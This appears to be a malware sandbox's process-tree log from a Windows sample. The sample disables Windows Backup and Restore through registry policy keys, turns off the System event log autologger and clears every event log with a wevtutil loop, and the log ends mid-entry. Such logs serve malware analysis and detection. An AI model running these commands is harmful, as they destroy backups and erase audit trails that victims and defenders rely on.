C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
2⤵
PID:2164

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
3⤵
PID:2148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:2140

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:2212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:2196

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:2192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
2⤵
PID:2184

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
3⤵
PID:2244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:2240

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:2236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:2224

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:2216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:2288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
2⤵
PID:2264

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
3⤵
PID:2256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
2⤵
PID:2320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
2⤵
PID:2312

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2344

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Application"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2332

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DebugChannel"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2372

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
3⤵
PID:2432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
3⤵
PID:2412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
3⤵
PID:2464

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
3⤵
PID:2456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
3⤵
PID:2504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
3⤵
PID:2484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Key Management Service"
3⤵
PID:2536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
3⤵
PID:2520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Media Center"
3⤵
PID:2572

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
3⤵
PID:2564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
3⤵
- Clears Windows event logs
PID:2544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
3⤵
PID:2596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
3⤵
PID:2584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
3⤵
PID:2628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
3⤵
PID:2644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
3⤵
- Clears Windows event logs
PID:2660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
3⤵
- Clears Windows event logs
PID:2696

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
3⤵
PID:2712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
3⤵
- Clears Windows event logs
PID:2732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
3⤵
PID:2760

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
3⤵
PID:2776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
3⤵
PID:2756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
3⤵
PID:2800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
3⤵
PID:2812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
3⤵
PID:2840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
3⤵
PID:2856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
3⤵
PID:2872

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
3⤵
PID:2888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
3⤵
- Clears Windows event logs
PID:2904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
3⤵
- Clears Windows event logs
PID:2920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
3⤵
PID:2936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
3⤵
PID:2952

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
3⤵
PID:2968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
3⤵
PID:2984

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
3⤵
PID:3000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
3⤵
- Clears Windows event logs
PID:3016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
3⤵
PID:3032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
3⤵
PID:3048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
3⤵
PID:3064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
3⤵
- Clears Windows event logs
PID:2136

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
3⤵
PID:952

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
3⤵
PID:2076

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
3⤵
PID:2168

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
3⤵
PID:2148

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Backup"
3⤵
PID:2212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
3⤵
PID:2192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
3⤵
PID:2244

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
3⤵
PID:2236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
3⤵
PID:2216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
3⤵
PID:2268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
3⤵
- Clears Windows event logs
PID:2256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
3⤵
PID:2316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
3⤵
PID:2352

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
3⤵
PID:2300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
3⤵
PID:2344

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
3⤵
PID:2328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
3⤵
PID:2376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
3⤵
PID:2428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
3⤵
PID:2420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
3⤵
PID:2400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
3⤵
- Clears Windows event logs
PID:2452

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
3⤵
PID:2440

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
3⤵
PID:2492

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
3⤵
PID:2472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
3⤵
PID:2528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
3⤵
PID:2560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
3⤵
PID:2548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
3⤵
PID:2604

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
3⤵
- Clears Windows event logs
PID:2588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
3⤵
PID:2616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
3⤵
PID:2632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
3⤵
PID:2648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
3⤵
PID:2668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
3⤵
- Clears Windows event logs
PID:2680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
3⤵
PID:2736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
3⤵
PID:2764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
3⤵
PID:2780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
3⤵
PID:2796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
3⤵
PID:2820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
3⤵
PID:2816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
3⤵
PID:2844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
3⤵
PID:2860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
3⤵
PID:2876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
3⤵
PID:2892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
3⤵
PID:2908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
3⤵
PID:2924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
3⤵
PID:2940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
3⤵
PID:2956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
3⤵
PID:2972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
3⤵
PID:2988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
3⤵
- Clears Windows event logs
PID:3004

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
3⤵
PID:3020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
3⤵
PID:3036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
3⤵
PID:3052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
3⤵
- Clears Windows event logs
PID:3068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
3⤵
- Clears Windows event logs
PID:1060

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
3⤵
PID:2172

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
3⤵
PID:2164

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
3⤵
PID:2188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
3⤵
- Clears Windows event logs
PID:2236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
3⤵
- Clears Windows event logs
PID:2216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
3⤵
PID:2324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
3⤵
PID:2336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
3⤵
PID:620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
3⤵
PID:2372

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
3⤵
PID:2448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
3⤵
PID:2496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
3⤵
PID:2480

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
3⤵
PID:2540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
3⤵
PID:2516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
3⤵
- Clears Windows event logs
PID:2576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
3⤵
PID:2556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
3⤵
PID:2608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
3⤵
PID:2600

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
3⤵
PID:2580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
3⤵
PID:2624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
3⤵
PID:2640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
3⤵
- Clears Windows event logs
PID:2656

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
3⤵
PID:2692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
3⤵
PID:2708

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
3⤵
PID:2728

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
3⤵
PID:2748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
3⤵
PID:2772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
3⤵
PID:2804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
3⤵
PID:2788

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
3⤵
- Clears Windows event logs
PID:2792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
3⤵
PID:2832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
3⤵
PID:2852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
3⤵
PID:2868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
3⤵
PID:2884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
3⤵
PID:2900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
3⤵
PID:2916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
3⤵
PID:2932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
3⤵
PID:2948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
3⤵
PID:2964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
3⤵
PID:2980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
3⤵
PID:2996

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
3⤵
PID:3012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
3⤵
PID:3028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
3⤵
PID:3048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
3⤵
PID:700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
3⤵
PID:3064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
3⤵
PID:980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
3⤵
- Clears Windows event logs
PID:2172

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
3⤵
PID:2164

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
3⤵
PID:2208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
3⤵
PID:2224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
3⤵
PID:2288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
3⤵
- Clears Windows event logs
PID:2316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
3⤵
PID:2348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
3⤵
PID:2384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
3⤵
- Clears Windows event logs
PID:2368

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
3⤵
PID:2428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
3⤵
PID:2444

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
3⤵
PID:2364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
3⤵
PID:2504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
3⤵
PID:2388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
3⤵
PID:2484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
3⤵
PID:2536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
3⤵
- Clears Windows event logs
PID:2520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
3⤵
PID:2572

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
3⤵
PID:2564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
3⤵
PID:2544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
3⤵
PID:2596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
3⤵
PID:2584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
3⤵
PID:2628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
3⤵
PID:2644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
3⤵
PID:2660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
3⤵
- Clears Windows event logs
PID:2696

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
3⤵
PID:2712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
3⤵
PID:2732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
3⤵
PID:2760

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Help/Operational"
3⤵
- Clears Windows event logs
PID:2776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
3⤵
- Clears Windows event logs
PID:2756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
3⤵
PID:2800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
3⤵
PID:2812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
3⤵
- Clears Windows event logs
PID:2840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
3⤵
PID:2856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
3⤵
PID:2880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
3⤵
PID:2896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
3⤵
PID:2912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
3⤵
PID:2928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
3⤵
PID:2944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
3⤵
PID:2960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
3⤵
PID:2976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
3⤵
PID:2992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International/Operational"
3⤵
PID:3008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
3⤵
PID:3024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
3⤵
PID:3040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
3⤵
PID:3052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
3⤵
PID:2136

C:\Windows\system32\wevtutil.exe
